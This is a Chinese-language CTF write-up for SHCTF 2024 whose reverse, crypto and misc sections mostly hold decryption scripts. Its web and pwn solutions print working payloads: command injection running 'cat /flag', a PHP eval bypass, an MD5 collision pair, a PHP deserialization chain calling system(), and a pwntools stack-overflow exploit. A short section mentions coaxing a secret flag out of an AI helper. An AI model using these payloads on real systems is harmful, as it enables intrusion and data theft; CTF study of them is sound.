re
gamegame
玩游戏也能签到??(本题的flag格式为:shctf{*})
数独,解就完事了,flag是填充的数
import copy
non_puzzle = [
[5, 3, 0, 0, 7, 0, 0, 0, 0],
[6, 0, 0, 1, 9, 5, 0, 0, 0],
[0, 9, 8, 0, 0, 0, 0, 6, 0],
[8, 0, 0, 0, 6, 0, 0, 0, 3],
[4, 0, 0, 8, 0, 3, 0, 0, 1],
[7, 0, 0, 0, 2, 0, 0, 0, 6],
[0, 6, 0, 0, 0, 0, 2, 8, 0],
[0, 0, 0, 4, 1, 9, 0, 0, 5],
[0, 0, 0, 0, 8, 0, 0, 7, 9]
]
puzzle = copy.deepcopy(non_puzzle)
def is_valid_move(puzzle, row, col, num):
if num in puzzle[row]:
return False
if num in [puzzle[r][col] for r in range(9)]:
return False
start_row, start_col = 3 * (row // 3), 3 * (col // 3)
for i in range(3):
for j in range(3):
if puzzle[start_row + i][start_col + j] == num:
return False
return True
def solve_sudoku(puzzle):
for row in range(9):
for col in range(9):
if puzzle[row][col] == 0:
for num in range(1, 10):
if is_valid_move(puzzle, row, col, num):
puzzle[row][col] = num
if solve_sudoku(puzzle):
return True
puzzle[row][col] = 0
return False
return True
solve_sudoku(puzzle)
for i in range(len(non_puzzle)):
for j in range(len(non_puzzle[i])):
if non_puzzle[i][j] == 0:
print(puzzle[i][j],end="")
ezxor
又来做逆向拉,xor来咯。
enc
注意
strcpy(v10, "o");
是两字节,\0结尾
enc=[-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]
flag=""
for i in range(26):
if i%3==1:
flag += chr((enc[i] ^ 0x21)%256)
elif i%3==2:
flag += chr((enc[i] ^ 0x31)%256)
else:
flag += chr((enc[i] ^ 0x90)%256)
print(flag)
SHCTF{x0r_N0ce_hxxxoorrr!}
ezrc4
又到了新生们最最最最喜欢的rc4了!对称算法?好简单嘞!
v4数组enc,v5数组key,flag长度21
变种rc4,多异或了一个0x66
解密
ezapk
apk?秒啦 (flag格式为:SHCTF{*})
enc
key
加密过程
import base64
encoded_str = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
key=[12, 15, 25, 30, 36]
flag=""
enc = base64.b64decode(encoded_str).decode('utf-8')
for i in range(len(enc)):
flag+=chr(((ord(enc[i])>>1)-6)^key[i%5])
print(flag)
EzDBG
题目描述: 一句话的意义在听者的心里,常像一只陌生的猫到屋里来,声息全无,直到“喵~”的一叫,你才发觉它的存在。
[10.03-16:35] 已更新为降低难度的附件
尝试找到EzDBG模块中的main函数
导入pdb
.sympath <pdb目录>
找到main函数地址
查看汇编,简单异或
EzDBG!main:
00007ff6`d4f31a10 4055 push rbp
00007ff6`d4f31a12 57 push rdi
00007ff6`d4f31a13 4881ec58010000 sub rsp, 158h
00007ff6`d4f31a1a 488d6c2420 lea rbp, [rsp+20h]
00007ff6`d4f31a1f 488d7c2420 lea rdi, [rsp+20h]
00007ff6`d4f31a24 b91e000000 mov ecx, 1Eh
00007ff6`d4f31a29 b8cccccccc mov eax, 0CCCCCCCCh
00007ff6`d4f31a2e f3ab rep stos dword ptr [rdi]
00007ff6`d4f31a30 488b0509b60000 mov rax, qword ptr [EzDBG!__security_cookie{.value} (7ff6d4f3d040)]
00007ff6`d4f31a37 4833c5 xor rax, rbp
00007ff6`d4f31a3a 48898528010000 mov qword ptr [rbp+128h], rax
00007ff6`d4f31a41 488d0d1e060100 lea rcx, [EzDBG!__0BF6D801_EzDBG@cpp (7ff6d4f42066)]
00007ff6`d4f31a48 e837f9ffff call EzDBG!@ILT+895(__CheckForDebuggerJustMyCode) (7ff6d4f31384)
00007ff6`d4f31a4d 90 nop
00007ff6`d4f31a4e 488d5508 lea rdx, [inputStr{[0]} (rbp+8)]
00007ff6`d4f31a52 488d0dcb920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad24)]
00007ff6`d4f31a59 e83df6ffff call EzDBG!@ILT+150(scanf) (7ff6d4f3109b)
00007ff6`d4f31a5e 90 nop
00007ff6`d4f31a5f c7455400000000 mov dword ptr [rbp+54h], 0
00007ff6`d4f31a66 eb08 jmp EzDBG!main+0x60 (7ff6d4f31a70)
00007ff6`d4f31a68 8b4554 mov eax, dword ptr [rbp+54h]
00007ff6`d4f31a6b ffc0 inc eax
00007ff6`d4f31a6d 894554 mov dword ptr [rbp+54h], eax
00007ff6`d4f31a70 837d5427 cmp dword ptr [rbp+54h], 27h
00007ff6`d4f31a74 7d32 jge EzDBG!main+0x98 (7ff6d4f31aa8)
00007ff6`d4f31a76 48634554 movsxd rax, dword ptr [rbp+54h]
00007ff6`d4f31a7a 488d0d7fb50000 lea rcx, [EzDBG!enc{[0]} (7ff6d4f3d000)]
00007ff6`d4f31a81 0fbe0401 movsx eax, byte ptr [rcx+rax]
00007ff6`d4f31a85 83f066 xor eax, 66h
00007ff6`d4f31a88 48634d54 movsxd rcx, dword ptr [rbp+54h]
00007ff6`d4f31a8c 0fbe4c0d08 movsx ecx, byte ptr inputStr{[0]} (rbp+8)[rcx]
00007ff6`d4f31a91 3bc1 cmp eax, ecx
00007ff6`d4f31a93 7411 je EzDBG!main+0x96 (7ff6d4f31aa6)
00007ff6`d4f31a95 488d0d8c920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad28)]
00007ff6`d4f31a9c e803f7ffff call EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31aa1 90 nop
00007ff6`d4f31aa2 33c0 xor eax, eax
00007ff6`d4f31aa4 eb11 jmp EzDBG!main+0xa7 (7ff6d4f31ab7)
00007ff6`d4f31aa6 ebc0 jmp EzDBG!main+0x58 (7ff6d4f31a68)
00007ff6`d4f31aa8 488d0d91920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad40)]
00007ff6`d4f31aaf e8f0f6ffff call EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31ab4 90 nop
00007ff6`d4f31ab5 33c0 xor eax, eax
00007ff6`d4f31ab7 488bf8 mov rdi, rax
00007ff6`d4f31aba 488d4de0 lea rcx, [rbp-20h]
00007ff6`d4f31abe 488d153b920000 lea rdx, [EzDBG!__xt_z[76] (7ff6d4f3ad00)]
00007ff6`d4f31ac5 e856f8ffff call EzDBG!@ILT+795(_RTC_CheckStackVars) (7ff6d4f31320)
00007ff6`d4f31aca 488bc7 mov rax, rdi
00007ff6`d4f31acd 488b8d28010000 mov rcx, qword ptr [rbp+128h]
00007ff6`d4f31ad4 4833cd xor rcx, rbp
00007ff6`d4f31ad7 e8e1f6ffff call EzDBG!@ILT+440(__security_check_cookie) (7ff6d4f311bd)
00007ff6`d4f31adc 488da538010000 lea rsp, [rbp+138h]
00007ff6`d4f31ae3 5f pop rdi
00007ff6`d4f31ae4 5d pop rbp
00007ff6`d4f31ae5 c3 ret
enc
解密脚本
# 密文(用十六进制表示)
ciphertext = [
0x35, 0x2E, 0x25, 0x32, 0x20, 0x1D, 0x03, 0x5E, 0x07, 0x56, 0x00, 0x03,
0x57, 0x57, 0x53, 0x50, 0x00, 0x54, 0x07, 0x00, 0x07, 0x07, 0x00, 0x03,
0x50, 0x02, 0x51, 0x5E, 0x5E, 0x03, 0x5F, 0x02, 0x56, 0x03, 0x57, 0x00,
0x50, 0x50, 0x1B
]
# 异或密钥
xor_key = 0x66
# 解密函数
def decrypt(ciphertext, key):
plaintext = ''.join(chr(byte ^ key) for byte in ciphertext)
return plaintext
# 调用解密函数
decrypted_message = decrypt(ciphertext, xor_key)
print("解密后的信息:", decrypted_message)
web
1zflask
题目描述: robots有什么用呢?
访问/s3recttt
,拿到源码
import os
import flask
from flask import Flask, request, send_from_directory, send_file
app = Flask(__name__)
@app.route('/api')
def api():
cmd = request.args.get('SSHCTFF', 'ls /')
result = os.popen(cmd).read()
return result
@app.route('/robots.txt')
def static_from_root():
return send_from_directory(app.static_folder,'robots.txt')
@app.route('/s3recttt')
def get_source():
file_path = "app.py"
return send_file(file_path, as_attachment=True)
if __name__ == '__main__':
app.run(debug=True)
/api?SSHCTFF=cat /flag
单身十八年的手速
题目描述: 点击就送flag
连点器
蛐蛐?蛐蛐!
题目描述: 尊敬的web手!请帮不想出题的fault蛐蛐某某某某,并将蛐蛐变为现实
<?php
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
if($_POST['ququ']!=null){
$eval_param = $_POST['ququ'];
if(strncmp($eval_param,'ququk1',6)===0){
eval($_POST['ququ']);
}else{
echo("可以让fault的蛐蛐变成现实么\n");
}
}
echo("蛐蛐成功第一步!\n");
}
else{
echo("呜呜呜fault还是要出题");
}
$_GET['ququ'] == 114514
弱比较
MD5 Master
题目描述: 你是 MD5 大师吗?
<?php
highlight_file(__file__);
$master = "MD5 master!";
if(isset($_POST["master1"]) && isset($_POST["master2"])){
if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
echo $master . "<br>";
echo file_get_contents('/flag');
}
}
else{
die("master? <br>");
}
php编码
bp发包
master1=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%1Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%89%1F%96P%E9%3EV%EE%05%26N%E3%B4%06S%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3%C4%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%81%D9%D4N%E4&master2=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%9Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%09+%96P%E9%3EV%EE%05%26N%E3%B4%06%D3%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC%B1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3D%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%01%D9%D4N%E4
ez_gittt
题目描述: 什么?竟然有人愿意把自己的秘密公开!!!???
直奔/.git
路由
githacker dump下/.git
githacker --url http://entry.shc.tf:44345/.git/ --output-folder result
查看日志
git log
git diff 554c928b2f67c9cd7d283706de161e6740c447a8
poppopop
题目描述: 简单的pop
源码
<?php
class SH {
public static $Web = false;
public static $SHCTF = false;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
return "其实。。。。,";
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
echo "小丑竟是我自己呜呜呜~";
} else {
echo "小丑别看了!";
}
}
}
if (isset($_GET['data'])) {
highlight_file(__FILE__);
unserialize(base64_decode($_GET['data']));
} else {
highlight_file(__FILE__);
echo "小丑离我远点!!!";
}
梭哈
<?php
class SH {
public static $Web = false;
public static $SHCTF = false;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
return "其实。。。。,";
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
echo "小丑竟是我自己呜呜呜~";
} else {
echo "小丑别看了!";
}
}
}
$a=new SHCTF();
$a->isyou='system';
$a->flag='cat /flllag';
$b=new C();
$b->p=$a;
$c=new F();
$c->o=$b;
$d=new T();
$d->n=$c;
echo base64_encode(serialize($d));
GET传参
jvav
题目描述: vavj
梭
import java.io.*;
public class demo{
public static void main(String[] args) {
try {
ProcessBuilder builder = new ProcessBuilder("sh", "-c", "cat /flag");
Process process = builder.start();
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
System.out.println(line);
}
process.waitFor();
} catch (IOException | InterruptedException e) {
e.printStackTrace();
}
}
}
pwn
签个到吧
题目描述: close nc
过滤,1s执行
No stack overflow1
题目描述: stack overflow? 我写了一个简单的checker来判断是否存在栈溢出,这个checker是否合理??
strlen,\x00绕过
from pwn import*
p=remote("entry.shc.tf",21687)
p.recvline()
shelladrress=0x4011DE
payload=b'\x00'*0x117+p64(shelladrress)
p.sendline(payload)
p.interactive()
misc
真真假假?遮遮掩掩!
题目描述: 假的就是假的,真的就是真的,遮遮掩掩的有什么用!
题目名提示伪加密,标志位改0
打不开flag.txt,还有加密
如下注释给了密码提示
爆破密码SHCTF202410FTCHS
SHCTF{C0ngr@tu1at1ons_On_Mast3r1ng_mAsk_aTT@ck5!}
拜师之旅①
题目描述: 一年一度的洛琪希美照大赏开始了,正好Nanian233下周要去拜师pngMaster, 参加入门考试. 就拿这个先练练手吧
缺png头
改宽高
import zlib
import struct
import binascii
file = 'roxy.png'
fr = open(file,'rb').read()
data = bytearray(fr[12:29])
#crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
crc32key = struct.unpack('>I',fr[29:33])[0]&0xffffffff
print(crc32key)
#data = bytearray(b'\x49\x48\x44\x52\x00\x00\x01\xF4\x00\x00\x01\xF1\x08\x06\x00\x00\x00')
n = 4096
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
#print(data)
crc32result = zlib.crc32(data)
if crc32result == crc32key:
print(crc32key)
print(width,height)
print(data)
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'.png','wb')
fw.write(newpic)
fw.close
有WiFi干嘛不用呢?
题目描述: k1每次来陪睡都要连WiFi,请帮他获取该wifi密码。flag提交方式:SHCTF{WiFi密码}。
前段时间做moectf的re题正好遇到wifi流量破解
这题给了may文件夹,看文件名和文件内容大概率是密码
提取一下
import os
folder_path = r'./may'
output_file = 'passwd.txt'
with open(output_file, 'w', encoding='utf-8') as f:
for filename in os.listdir(folder_path):
file_path = os.path.join(folder_path, filename)
if os.path.isfile(file_path):
f.write(f'{filename}\n')
with open(file_path, 'r', encoding='utf-8') as file:
content = file.read()
f.write(f'{content[1:-2]}\n')
hashcat hcxpcapngtool - advanced password recovery转一下
字典爆破
./hashcat -m 22000 -a 0 2165215_1728068768.hc22000 passwd.txt
Rasterizing Traffic
题目描述: Man! What can I say!!!
分析流量包,也就一个png比较明显了
导出,多余删掉
光栅
from PIL import Image
import numpy as np
for j in range(5):
img = Image.open('.png').convert('L')
width, height = img.size
img_data = np.array(img)
start = 1
interval = 5
start+=j
for i in range(start, width, interval):
img_data[:, i:i + interval - 1] = 0
Image.fromarray(img_data)
new_image = Image.fromarray(img_data)
new_image.save(f'./ouput/{j}.png')
SHCTF{1111z_tr@ff1c_aNaLys13}
crypto
EzAES
题目描述: 最最简单的AES
源码
from Crypto.Cipher import AES
import os
iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = open('flag.txt', 'rb').read()
flag += (16 - len(flag) % 16) * b' '
c = my_aes.encrypt(flag)
print(c)
print(iv)
print(key)
'''
b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
解密
from Crypto.Cipher import AES
key = b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
iv = b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
my_aes_decrypt = AES.new(key, AES.MODE_CBC, iv)
ciphertext = b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
plaintext = my_aes_decrypt.decrypt(ciphertext)
plaintext = plaintext.rstrip(b' ')
print(plaintext)
Hello Crypto
题目描述: 你好,现代密码学
源码
from Crypto.Util.number import bytes_to_long
from secret import flag
m = bytes_to_long(flag)
print("m =",m)
# In cryptography, m stands for message, also plaintext
# so, why this m is number?
# decrypt this Message to get flag!
# m = 215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
我真的哭死,第一次遇到能让我不用ai直接手搓出来的题呜呜呜
解密脚本
from Crypto.Util.number import*
m=215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
flag=long_to_bytes(m)
print(flag)
factor
factor and combination
yafu分解
.\yafu-x64.exe "factor(202684025069666122928943870473693390943999154246475102682928603649889979837891808145761938294210543968287387118675294961417296597826107898446066891091139992043145111792866874820404982180534411)"
gpt梭哈
from itertools import combinations
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
# 给定的质数列表(从 N 的分解得到的)
prime_list = [
18382585067038096651,
14840413069428752761,
9845968710564320221,
11985382012119355663,
16974023387369024819,
15073937162523269353,
15879874287378916289,
12489385236654944237,
11580488510409206699,
10713468965251790263
]
# 给定的密文和公钥指数 e
c = 74957645771347063156084390560511541272461735783664273246902636936377661944639588841276568374009308588456113421628518882519406151899764
e = 65537
# 1. 尝试组合7个质数并计算 n 和 phi(n)
for p_list in combinations(prime_list, 7):
n = 1
for p in p_list:
n *= p
# 计算 phi(n)
phi_n = 1
for p in p_list:
phi_n *= (p - 1)
# 2. 计算私钥 d
d = inverse(e, phi_n)
# 3. 尝试解密密文
try:
m = pow(c, d, n)
flag = long_to_bytes(m)
if b'CTF{' in flag: # 检查 flag 格式
print(f"解密成功: {flag}")
break
except ValueError:
continue
baby_mod
题目描述: 模 = mod
题目源码
from Crypto.Util.number import *
from enc import flag
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(777)
t = getPrime(777)
tmp = getPrime(15)
e = 65537
n = p*q
print(f"c = {pow(m,e,n)}")
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
'''
搜p*r-q*t-tmp
搜到SRCTF2024-baby极为相似
找了几位师傅的脚本试了试,最后利用了DexterJie师傅的脚本SRCTF | DexterJie’Blog
正负都没改,直接替换了值,竟然能直接出结果,虽然不理解,但极为震撼
from Crypto.Util.number import *
c = -69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
Ge = Matrix(ZZ,[
[leak,0,0,0],
[r,1,0,0],
[t,0,1,0],
[-1,0,0,2^500]
])
Ge[:,0] *= 2^2000
for line in Ge.LLL():
if line[0] == 0:
p,q = abs(line[1]),abs(line[2])
n = p * q
d = inverse(65537,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))
# SRCTF{0896649c53c145919ce741f180957834}
有意思的是,另一位师傅的代码最后也跑出来了
import itertools
def small_roots(f, bounds, m=1, d=None): # 多元copper
if not d:
d = f.degree()
R = f.base_ring()
N = R.cardinality()
f /= f.coefficients().pop(0)
f = f.change_ring(ZZ)
G = Sequence([], f.parent())
for i in range(m + 1):
base = N ^ (m - i) * f ^ i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)
B, monomials = G.coefficient_matrix()
monomials = vector(monomials)
factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)
B = B.dense_matrix().LLL()
B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1 / factor)
H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B * monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots
return []
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
R.<p,q> = Zmod(leak)[]
for tmp in range(2 ^ 14, 2 ^ 15):
f = p*r-q*t-tmp
res = small_roots(f, bounds=(2 ^ 512, 2 ^ 512), m=3, d=2)
if res:
print(res)
break
就是跑得挺久,毕竟是2的14次方
from Crypto.Util.number import inverse, long_to_bytes
# 提供的素数和密文
p=11799365899073049527038222991817294163432468116739044155324163062605081459516948129587956698210751311282285532041297993219199812623993179858635079156564471
q=7920780147742343919802692215442217736320564739726806695299813117512855265349275493667659977160207404159832804023039365285757320911861469820804465066706263
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
# RSA 参数
n = p * q
phi_n = (p - 1) * (q - 1)
e = 65537 # 公钥指数,通常是这个值
# 计算私钥 d
d = inverse(e, phi_n)
# 解密
m = pow(c, d, n)
# 将解密后的长整型转换为字节
flag = long_to_bytes(m)
print("解密后的 flag:", flag.decode())
AI
小助手
这里有一只可爱的小助手,生蚝给了他一个神秘的小flag,你如果忍心抢走flag,ta会受到惩罚的,不要抢走flag好不好/(ㄒoㄒ)/~~
这玩意就看命
一般nc连接第一次成功可能性比较大(可能刚初始化)
中间还爆出过这个,可能是对结果进行检测过滤吧
区块链
just Signin
赶时间出的,非预期做起来会很简单
Sepolia Address: 0x3948DF4C50B1671eaa6b22876Ea746899a6916C1
What is a Blockchain Explorer? Focus on input data
Sepolia Transaction Hash (Txhash) Details | Etherscan
bytecode